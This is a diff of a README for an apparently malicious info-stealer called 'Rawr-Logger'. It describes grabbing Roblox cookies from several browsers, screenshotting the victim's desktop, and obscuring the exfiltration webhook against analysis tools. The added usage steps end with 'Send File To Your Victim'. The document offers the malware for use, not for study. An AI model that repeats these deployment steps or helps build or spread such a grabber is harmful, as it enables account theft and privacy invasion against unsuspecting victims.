Joseloll/Rawr-Logger/README.md

 - Takes A ScreenShot Of There Desktop When They Run The File
 -  Has Protection To The Grabber
  - Added Where Its Harder To Get The Webhook If They Process Hacker OR Etc To Get The Webhook
+# How To Use
+- Make Sure To Have Python Install And Pip Added To Path
+- Then Run Install.bat
+- Then Run Builder.py
+- Then Fill Out Info In Builder.Py
+- Then Send File To Your Victim

 # To Do
 - ✅ Make Where It Grabs The Roblox Cookie From More Browsers
 - ✅ Make A Complied Version